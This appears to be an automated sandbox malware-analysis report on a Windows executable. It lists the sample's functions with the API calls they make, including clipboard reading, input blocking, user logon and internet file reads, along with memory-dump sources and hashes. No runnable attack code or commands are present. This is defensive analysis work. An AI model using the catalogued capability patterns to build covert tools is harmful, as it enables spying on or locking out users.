                                                                                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                        Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                        • IsWindowVisible.USER32 ref: 0047A368
                                                                                                        • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                        • IsIconic.USER32 ref: 0047A393
                                                                                                        • IsZoomed.USER32 ref: 0047A3A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                        • String ID:
                                                                                                        • API String ID: 292994002-0
                                                                                                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                        Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                        • CoUninitialize.OLE32 ref: 0047863C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                        • String ID: .lnk
                                                                                                        • API String ID: 886957087-24824748
                                                                                                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                        Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 15083398-0
                                                                                                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                        Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: U$\
                                                                                                        • API String ID: 4104443479-100911408
                                                                                                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                        Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                        • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                        Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 48322524-0
                                                                                                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                        Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 901099227-0
                                                                                                        • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                        • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                        Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Proc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2346855178-0
                                                                                                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                        Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BlockInput
                                                                                                        • String ID:
                                                                                                        • API String ID: 3456056419-0
                                                                                                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                        Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LogonUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1244722697-0
                                                                                                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                        Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NameUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2645101109-0
                                                                                                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                        Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                        Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: N@
                                                                                                        • API String ID: 0-1509896676
                                                                                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                        Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                        Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
